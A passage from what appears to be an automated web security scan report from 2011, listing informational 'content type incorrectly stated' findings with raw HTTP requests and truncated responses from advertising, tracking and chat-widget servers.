User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: b2p.imgsrc.ru

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:40:39 GMT
Content-Type: image/jpeg
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: keep-alive
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Accept-Ranges: bytes

GIF89a.............!.......,...........L..;

33.12. http://breathe.c3metrics.com/c3realview.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://breathe.c3metrics.com
Path:   /c3realview.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /c3realview.js HTTP/1.1
Host: breathe.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; SERVERID=s11

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:08:32 GMT
Server: Apache
P3P: CP="NON DSP CURa ADMo DEVo PSAo PSDo IVAo IVDo OUR SAMo BUS UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Connection: close
Content-Type: text/html
Content-Length: 9583

(function(){c3CTJS={c3CTVersion:{vNo:'5.1.0'},c3CJS:{c3CJScampignId:'480',c3CJSdomain:null,c3VJSuid:'13014572191303613803',c3VJSnuid:'',c3CJSnetwork:'1',c3CJSOrganic:1,c3CJSOrganicQ:2,c3CJSlenSet:2,c3
...[SNIP]...

33.13. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/ActivityServer.bs

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /BurstingPipe/ActivityServer.bs?cn=as&ActivityID=44536&rnd=288817.4828887202 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=2cd7097f-7369-4ae1-ac1c-c726ae580b4d3HM0b0; expires=Sat, 23-Jul-2011 20:35:44 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 25 Apr 2011 00:35:43 GMT
Connection: close
Content-Length: 3916

var part0 = '';
part0 += "<"+"!-- Do Not Remove - Turn Tracking Beacon Code - Do Not Remove -->\n";
part0 += "<"+"!-- Advertiser Name : MYFICO -->\n";
part0 += "<"+"!-- Beacon Name : MYFICO - RETARGE
...[SNIP]...

33.14. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2099675&PluID=0&w=160&h=600&ord=7481875708042352330&ucm=true&ncu=http://r.turn.com/r/tpclick/id/yhZ911D21GdsBwUAAwIBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBHhYPCky0Tba3G8ntlQfWrtDhAsCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAbClYHu9567sukB%26num%3D1%26sig%3DAGiWqtwpBMlqXzWHH4VX4kgZ93lH-yM4vQ%26client%3Dca-pub-6888065668292638%26adurl%3D/url/ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679581&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661581392&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661581397&frm=1&adk=2614322350&ga_vid=918498602.1303661581&ga_sid=1303661581&ga_hid=284338913&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=8023169f-8dce-4de3-84d7-d5a4468633313HG09g; eyeblaster=FLV=10.2154&RES=128&WMPV=0; A3=iQQIaFx503Dk00000iZLfaFB607pd00001j4HbaE.a0a9y00001jcM0aFSa04m400000eDVwaDPh084o00001hH4jaFhv09wy00001hEI2aE.a09B400001jmnFaEUX09SF00002johvaFxN07uh00002hUDyaFGt0cbS00001i54CaFsN09MT00000eDVtaDP.084o00001jeoLaF6J07Hs00001j8QYaEBz07LU00001igT+aFh30cXt00001hUBuaFGu0cbS00001iBU1aEBz0aVU000019rW0aFGt04uw00001; B3=7.Wt0000000001ui9cTR0000000001uf8Dka0000000001uh9abz0000000000ui52BU0000000001ui8TfJ0000000001uh93M20000000001uf9kkO0000000000uj8OuK0000000000ui78Oj0000000001ud9qqo0000000002ui78O70000000001ud9gdG0000000001uh8z+.0000000001uh9pRI0000000002ug9iae0000000001uh7.Ws0000000001ui99y10000000001ui

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=iQQIaFx503Dk00000iZLfaFB607pd00001j4HbaE.a0a9y00001eDVwaDPh084o00001jcM0aFSa04m400000gY2paFSZ09nl00001hH4jaFhv09wy00001jmnFaEUX09SF00002hEI2aE.a09B400001johvaFxN07uh00002i54CaFsN09MT00000hUDyaFGt0cbS00001eDVtaDP.084o00001jeoLaF6J07Hs00001j8QYaEBz07LU00001hUBuaFGt0cbS00001igT+aFh30cXt000019rW0aFGt04uw00001iBU1aEBz0aVU00001; expires=Sat, 23-Jul-2011 12:13:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7.Wt0000000001ui8Dka0000000001uh9cTR0000000001uf52BU0000000001ui9abz0000000000ui8TfJ0000000001uh93M20000000001uf9kkO0000000000uj8OuK0000000000ui78Oj0000000001ud9qqo0000000002ui9gdG0000000001uh78O70000000001ud9pRI0000000002ug8z+.0000000001uh9iae0000000001uh80Dr0000000001uj99y10000000001ui7.Ws0000000001ui; expires=Sat, 23-Jul-2011 12:13:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 24 Apr 2011 16:12:59 GMT
Connection: close
Content-Length: 2131

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

33.15. http://cdn.apture.com/media/searchfilter.khtml.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn.apture.com
Path:   /media/searchfilter.khtml.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /media/searchfilter.khtml.js?v=29213360 HTTP/1.1
Host: cdn.apture.com
Proxy-Connection: keep-alive
Referer: http://cdn.apture.com/media/html/aptureLoadIframe.html?v=29213360
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AC=QuDxqe1K4l

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:40:09 GMT
Server: PWS/1.7.1.5
X-Px: ht iad-agg-n25.panthercdn.com
P3P: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Cache-Control: max-age=604800
Expires: Thu, 28 Apr 2011 00:05:59 GMT
Age: 351250
Content-Type: application/x-javascript
Vary: Accept-Encoding
Px-Uncompress-Origin: 4047
Last-Modified: Wed, 20 Apr 2011 23:52:28 GMT
Connection: keep-alive
Content-Length: 4047

apture.fileCache.load("searchfilter", "if(window.apture.Fs)window.apture.Fs.Ss=/\\b(be~?an~?er|qu~?ee~?f|mo~?th~?er~?fu~?ck~?s|ej~?ac~?ul~?at~?ed|cu~?nt~?li~?ck~?er|as~?sh~?ol~?es|mi~?lf|pe~?ni~?s|pi~
...[SNIP]...

33.16. http://cdn.gigya.com/js/gigya.services.socialize.plugins.login.min.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn.gigya.com
Path:   /js/gigya.services.socialize.plugins.login.min.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /js/gigya.services.socialize.plugins.login.min.js HTTP/1.1
Host: cdn.gigya.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 11 Apr 2011 08:54:33 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
x-server: web102
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
X-Powered-By: ASP.NET
Cache-Control: max-age=900
Date: Sun, 24 Apr 2011 19:47:49 GMT
Connection: close
Content-Length: 58954

(function(){if(typeof gigya.services.socialize.plugins=="undefined"){gigya.services.socialize.plugins={};}var _pi=gigya.services.socialize.plugins;if(typeof _pi.common=="undefined"){_pi.common={addCSS
...[SNIP]...

33.17. http://cdn.gigya.com/js/gigya.services.socialize.plugins.simpleshare.min.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn.gigya.com
Path:   /js/gigya.services.socialize.plugins.simpleshare.min.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /js/gigya.services.socialize.plugins.simpleshare.min.js HTTP/1.1
Host: cdn.gigya.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 13 Apr 2011 08:08:57 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
x-server: web102
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
X-Powered-By: ASP.NET
Cache-Control: max-age=900
Date: Sun, 24 Apr 2011 19:47:17 GMT
Connection: close
Content-Length: 21429

gigya.global._GetElementPos=function(obj){var curleft=curtop=0;if(obj.offsetParent){do{curleft+=obj.offsetLeft;curtop+=obj.offsetTop;}while(obj=obj.offsetParent);}return{left:curleft,top:curtop};};gig
...[SNIP]...

33.18. http://chat.echomail.com/livezilla/server.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://chat.echomail.com
Path:   /livezilla/server.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /livezilla/server.php?request=track&output=jcrpt&nse=0.4210994567256421 HTTP/1.1
Host: chat.echomail.com
Proxy-Connection: keep-alive
Referer: http://engine03.echomail.com/icomee-regs/trial/MonitoringTrial.jsp?m=2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:49:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Cache-Control: no-cache, must-revalidate
Set-Cookie: livezilla=YToxOntzOjg6ImZvcm1fMTExIjtzOjA6IiI7fQ%3D%3D; expires=Sat, 09-Jul-2011 00:49:53 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 34277

var lz_title_timer;
var lz_title_step = 0;
var lz_title_modes = new Array(document.title,"<!--lang_client_new_messages-->");
var lz_standard_title = document.title;
var lz_document_head = document
...[SNIP]...

33.19. http://chat.india.interactive.com/livezilla/server.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://chat.india.interactive.com
Path:   /livezilla/server.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /livezilla/server.php?request=track&start=1303691656062&browid=18a71fa915&url=aHR0cDovL2VuZ2luZTAzLmVjaG9tYWlsLmNvbS9pY29tZWUtcmVncy90cmlhbC9Nb25pdG9yaW5nVHJpYWwuanNwP209Mg&livezilla=58a00c1416&cd=16&rh=1200&rw=1920&rf=&tzo=-5&code=&en=&ee=&ec=&dc=RWNob01haWw&cf0=&cf1=&cf2=&cf3=&cf4=&cf5=&cf6=&cf7=&cf8=&cf9=&geo_rid=7 HTTP/1.1
Host: chat.india.interactive.com
Proxy-Connection: keep-alive
Referer: http://engine03.echomail.com/icomee-regs/trial/MonitoringTrial.jsp?m=2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:50:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Cache-Control: no-cache, must-revalidate
Set-Cookie: livezilla=YToxOntzOjY6InVzZXJpZCI7czoxMDoiNThhMDBjMTQxNiI7fQ%3D%3D; expires=Sat, 09-Jul-2011 00:50:22 GMT
Content-Length: 76
Content-Type: text/html; charset=UTF-8

lz_tracking_set_sessid("58a00c1416","18a71fa915");lz_tracking_callback(220);

33.20. http://chat.livechatinc.net/licence/1028624/script.cgi  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://chat.livechatinc.net
Path:   /licence/1028624/script.cgi

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /licence/1028624/script.cgi?lang=en&groups=0 HTTP/1.1
Host: chat.livechatinc.net
Proxy-Connection: keep-alive
Referer: http://krypt.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-type: application/x-javascript;
Set-Cookie: lc_session=S1303662876.6a6345f885&lc_last_visit=1303662876&lc_visit_number=1&lc_page_view=1&lc_nick=$&lc_chat_number=0&lc_all_invitation=0&lc_ok_invitation=0&lc_last_operator_id=$&lc_client_version=$&lc_last_conference_id=$&lc_lang=en; expires=Tue, 23-Apr-2013 18:34:36 GMT; path=/licence/1028624; domain=chat.livechatinc.net;
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 12324
Connection: Keep-Alive

if(typeof __lc_loaded=='undefined'){var __lc_loaded=true;eval((function(s){var a,c,e,i,j,o="",r,t=".......................@`~";for(i=0;i<s.length;i++){r=t+s[i][2];a=s[i][1].split(".");for(j=a.length
...[SNIP]...

33.21. http://consumerinfo.tt.omtrdc.net/m2/consumerinfo/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://consumerinfo.tt.omtrdc.net
Path:   /m2/consumerinfo/mbox/standard

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/consumerinfo/mbox/standard?mboxHost=www.freecreditscore.com&mboxSession=1303674291453-51326&mboxPage=1303674291453-51326&mboxCount=1&mbox=FCS_LP21_TopSection&mboxId=0&mboxTime=1303656291456&mboxURL=http%3A%2F%2Fwww.freecreditscore.com%2Fdni%2Fdefault.aspx%3FPageTypeID%3DHomePage21%26SiteVersionID%3D932%26SiteID%3D100323%26sc%3D671212%26bcd%3D&mboxReferrer=&mboxVersion=38 HTTP/1.1
Host: consumerinfo.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.freecreditscore.com/dni/default.aspx?PageTypeID=HomePage21&SiteVersionID=932&SiteID=100323&sc=671212&bcd=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 173
Date: Sun, 24 Apr 2011 19:54:32 GMT
Server: Test & Target

mboxFactories.get('default').get('FCS_LP21_TopSection',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1303674291453-51326.17");

33.22. http://controlcase.com/process_contact.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://controlcase.com
Path:   /process_contact.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /process_contact.php HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 17:25:21 GMT
Server: Apache/2.0.55 (Win32)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5
Connection: close
Content-Type: text/html; charset=ISO-8859-1

false

33.23. http://controlcase.com/process_form_DL.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://controlcase.com
Path:   /process_form_DL.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /process_form_DL.php HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 17:25:47 GMT
Server: Apache/2.0.55 (Win32)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5
Connection: close
Content-Type: text/html; charset=ISO-8859-1

false

33.24. http://controlcase.com/process_form_PW.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://controlcase.com
Path:   /process_form_PW.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /process_form_PW.php HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 17:25:32 GMT
Server: Apache/2.0.55 (Win32)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 37
Connection: close
Content-Type: text/html; charset=ISO-8859-1

Password doesn't match. Try Again !!!

33.25. http://echomail.com/js/scroller_lg.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://echomail.com
Path:   /js/scroller_lg.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /js/scroller_lg.js HTTP/1.1
Host: echomail.com
Proxy-Connection: keep-alive
Referer: http://echomail.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAQTTABCB=MILNDKCCKONBCAFLCBPHOMHD

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 20 Jan 2011 10:54:27 GMT
Accept-Ranges: bytes
ETag: "80b326890b8cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 00:43:41 GMT
Content-Length: 935

sts_bs("JWS2",[20080623,"images/large/","","blank.gif",4,1,1,2,"440px","left",0,0,110,75,0,75,1,0,0,2000,1,30,0,"stEffect(\"scroll(Rate=24,enabled=0,Duration=0.50)\")",-2,60],["ItBS","ItBW","ItBC","GB
...[SNIP]...

33.26. http://echomail.com/js/scroller_sm.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://echomail.com
Path:   /js/scroller_sm.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /js/scroller_sm.js HTTP/1.1
Host: echomail.com
Proxy-Connection: keep-alive
Referer: http://echomail.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAQTTABCB=MILNDKCCKONBCAFLCBPHOMHD

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 20 Jan 2011 10:53:07 GMT
Accept-Ranges: bytes
ETag: "80ab533890b8cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 00:43:41 GMT
Content-Length: 885

sts_bs("JWS2",[20080623,"images/small/","","blank.gif",4,1,1,2,"440px","left",0,0,110,75,0,75,1,0,0,2000,1,30,0,"stEffect(\"scroll(Rate=24,enabled=0,Duration=0.50)\")",-2,60],["ItBS","ItBW","ItBC","GB
...[SNIP]...

33.27. http://equfx.netmng.com/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://equfx.netmng.com
Path:   /

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /?aid=089&tax=search HTTP/1.1
Host: equfx.netmng.com
Proxy-Connection: keep-alive
Referer: http://equifax.com/free30daytrial/?CMP=KNC-Google&HBX_PK=credit_monitoring_service&HBX_OU=50&gclid=CNf214_1tagCFeM85Qod4FaqEA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=cb45f86e-c186-488a-9d0f-aec6be178ed4; evo5=z2r8aytrpwakd%7CVnJm2nQviGpaZgoGV9njty5dIKdTca7cnNRAhZgA7bUbQnOUYrA7QBTQboME7kIs19d0OlmuCnEeS5N%2BBoSear2lfgsSwBvum2xekwmZoirZuJ4TXW2WJtuCxf1Pp6ICIBk9N%2FoTrTdf3BCWsu823ZkyUJT7dLxvLsz0w3DIGnrdxoSNhm6xM%2FE9JbrlmDUWUcuxr1W8xHYYCCPmO5uHdnaoIVbKtmx2uYNLFduONvRvhMR46uJ4OnjnsgS460tRM3axEGKfL%2Fwm%2BuXWLQDQwgQ4%2F0HN%2B81ajfaXCwGP3na8atr8q00NzqmcJWES426PY6CkoksWs82sE4ogKqAdyA%3D%3D

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:44:40 GMT
Server: Apache/2.2.9
P3P: policyref="http://equfx.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Fri, 22 Apr 2011 19:44:40 GMT
Last-Modified: Fri, 22 Apr 2011 19:44:40 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5=z2r8aytrpwakd%7CaX1f%2BX%2FH0XmnewULrgjFuBdyNO5Bfd3pDQ5D3BffaKygm7dWhxyfMeptI88DhCWPCMieuKmcL2x7c%2BH19wRjGU6WMC%2Fj5YTTPSS3NzPOIqDufmtYKfD%2Fi7sByDhAGs4OaaGcL4fkM8ToE%2B1SbyyQPiv4JgRuJqgqvzAT0PhUc2Qq%2FA2FuWNxwCQiehpdqupOwMrOGkuNMKcb6Y%2BAaCdn6sjXowEdBlDwqn1M5yyByn0Mo2yD2HaLuUD5MWy4CYKI6X7QwffnTgfB6NG4hGmbw6tDbDL4x7rpuRd4CBCv9vA%3D; expires=Mon, 24-Oct-2011 19:44:40 GMT; path=/; domain=.netmng.com
Content-Length: 618
Connection: close
Content-Type: text/html; charset=UTF-8


var i=document.createElement('IMG'); i.src='http://ad.trafficmp.com/a/bpix?adv=1470&id=1&r='; i.width=1; i.height=1; i.border=0; i.vspace=0; i.hspace=1; document.body.appendChild(i);
var i=document.
...[SNIP]...

33.28. http://equifax.com/free30daytrial/css/slatestd-bold-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://equifax.com
Path:   /free30daytrial/css/slatestd-bold-webfont.woff

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /free30daytrial/css/slatestd-bold-webfont.woff HTTP/1.1
Host: equifax.com
Proxy-Connection: keep-alive
Referer: http://equifax.com/free30daytrial/?CMP=KNC-Google&HBX_PK=credit_monitoring_service&HBX_OU=50&gclid=CNf214_1tagCFeM85Qod4FaqEA
